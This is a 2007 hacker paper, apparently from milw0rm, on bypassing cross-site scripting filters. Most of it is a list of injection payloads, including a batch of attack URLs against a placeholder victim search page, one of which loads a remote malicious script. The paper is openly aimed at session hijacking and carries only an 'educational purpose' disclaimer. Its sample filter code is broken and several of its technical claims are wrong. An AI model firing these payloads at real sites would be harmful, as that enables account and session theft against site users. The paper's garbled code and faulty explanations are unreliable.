/*Cross Site Scripting filtration Bypass
Arham Muhammad
rko.thelegendkiller@gmail.com */
_____________________________________________________________________________________________________________________________
_1
__________________________________________
Introduction To Xss(Cross site scripting):
'Cross-Site Scripting' also known as 'XSS' in short is a kind of vulnerability that exist in era of both web applications
as well as os based applications, but in most cases in web applications.You might be wondering why it's known as 'xss' not
'css' reffering to the full form.Well, basically css is already a reserved abbreviation of 'Cascade Style Sheets'.It allows
malicious code to be executed on a vulnerable server most probably session hijacking to gain administrator privileges.
Xss totally depends on cookies and session and though 'cookies' are known as the backbone of Cross-Site Scripting
Vulnerability.
_2
_______________________________
Brief Description On The Paper:
The paper is based on the bypassing of filtration of a common web application security hole known as
Xss(Cross site scripting). Xss being a common hole is winning attention of webmasters and their concerns
about the afteraffects and the danger that can be exploited through a possible xss hole, and because of this
most webmasters are patching or acutally it can be said they are filtering and sanitizing common known xss injection
strings to deny a malicious input or request to overcome xss holes.
These people think that it's just enough to filter some common known strings and boom that's it, but it's not likely
to say that you have 'filtered' the holes with just some common known characters.
__________________________________________________________________________________
_3
_____________________________________________
Common Xss Strings To Inject:
Basically, javascript and html and in some cases vbscript is injected through a xss vulnerability in a particular
server.Php can't be injected since it's server-side and is executed on the very moment.Thus we will first analyse some
common xss strings to inject.
1{ <html><font color="Red"><b>Pwned</b></font></html>
This is a basic html injection and if you are able to execute it on a vulnerable server you will see the message
'pwned' somewhere on the vulnerable site.
2{ <script>alert('xss')</script>
This is a basic javascript injection which will display a pop-up box with the message 'xss' on it.
3{ "><script>alert('xss')</script>
This is a secondary javascript injection to the vulnerable server, which is also mostly patched on most servers
being a common string.
____________________________________________________________________________________________________________
_4
_____________________________________________
Xss Filteration Pattern And Overcoming It:
Webmasters mostly filter common strings in javascript to prevent hijacking, which means a gurantee bypass on the server,
since javascript is client-side and once the page is saved and altered, the hacker comes to the scene!
We will now examine the filtration pattern in javascript.
-----------------------------------------------------
<script Language="JavaScript">
function denyxssreplacestring()
{
var length = document.forms[0].elements.length;
for (var i = 0; i < document.forms[0].elements.length; i++)
}
{
if (document.forms[0].elements[i].value != malstring(document.forms[0].elements[i].value))
}
{
alert ("Cross-Site Scripting Attempt!");
return (false);
}
function malstring(string) {
string = string.replace(/\</g,"");
string = string.replace(/\>/g,"");
string = string.replace(/\+/g,"");
return (string);
}
//--></script>
-----------------------------------------------------
Now we see that the javascript is sanitizing user's input and keeping in view the length of string, which if exceed the
length or input any malicious string, it will abort the request excluding unsanitized strings, remove the string and
generate an alert message.
How simple, if we just save the page with xss filtration and alter it and remove the javascript, save again and
inject some shit, bump! it works!
Now you might be wondering that if we alter the page, then save and inject, it's of no use, since the server side work is
finished, but you are wrong!
Lets take an example of a search form
--------------------------------------
FORM ACTION="search.php" METHOD="GET">
<INPUT TYPE="Hidden" NAME="search" VALUE="">
--------------------------------------
Now we see the server is making a 'GET' Request, which means our altered page will work for sure! Since it's sending a get
request to 'search.php' without any filteration and wow! what we have here is a nice old vulnerable server to hijack session
or exploit some other way!
_5
____________________________________________________
Bypassing Xss Simple Filteration Without Alteration:
Now we notice, the above script we used for filtration is evolving only a few strings, knowing there are bunch of ways and
strings to inject a malicious request.
It's only filtering '< > /' means leaving hackers with a vast amount of other strings to inject a malicious code.
Now the question is since '<' and '>' are filtered, how we will be able to send a javascript or html code injection?
Well, the answer is quite easy, javascript can be executed using ' and " before the orignal script.
For instance,
')alert('xss');
This will generate an alert box again on a vulnerable server.
Secondly,
");alert('xss');
This will too generate an alert box on a vulnerable server.
___________________________________________________________
_6
__________________________________________________________
Bypassing Advance Xss Filtration:
Some webmasters filter lot more than this, especially it's filtered on important sites like gov and org sites.
But all depends on their pattern if they are doing this in javascript, we will of course just alter the page but what if
the filtration is not in javascript, instead is in html or php or even asp.
There's nothing impossible, we will try to get as much info about the filtration as much we can.
Supposing a server that have filtered all strings just more than common in a way that it reads the malicious string in the
beginning or in the end to avoid and abort it, this of course can be bypassed too!
An example can be likely so:
helloworld<script>alert('xss')</script>
The above script will bypass filtration for the server that reads the malicious string in the beginning.
helloworld<script>alert('xss')<script>helloworld
This will bypass filtration on server that reads whether in the beginning or in the end or at both ends!
Mostly, this kind of filtration isn't common, so cant be of much use!
Some webmasters also filter the word 'xss' so it's likely to use some other message for making an alert.
<script>alert('hello world')</script>
This will bypass message filtration.
Now we will study some more advance filtration bypass.
Some webmasters just simply define a pattern of a cross-site scripting script that is possibly common.
In this case, I will mention here the full array of strings to inject, bypassing the filtration.
We will suppose injecting in a search form.
victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script><script>location.href='javascript:alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>
--------------------------------------------------------------------------------
These are some of the advance arrays of javascript code injection on a vulnerable server through xss.
This includes a quite advance range, bypassing the filtration pattern from alpha to numeric and alpha-numeric,
overcoming, if the word 'alert' is filtered, with 'document.write' and 'location.href' functionality,
and of course you can do a lot addition in it as long as you know what exactly are you doing :p
overcoming simple and both advance filtration pattern, giving a 99% chance to succeed in all aspects!
__________________________________________________________________________________________________________
Conclusion:
The paper is based on bypassing both simple and advance filtration patterns and gaining infinity advantages!
I wrote this article, as "Cross-Site Scripting" being in my interest and this paper is for educational purpose only!
I don't hold any responsibility for any misuse or real-time exploitation from this paper!
___________________________________________________________________________________________________________
/ Shouts ANd Greets To: str0ke,USMAN,tushy,Hackman,shubham,Fix and all my friends!
# milw0rm.com [2007-06-07]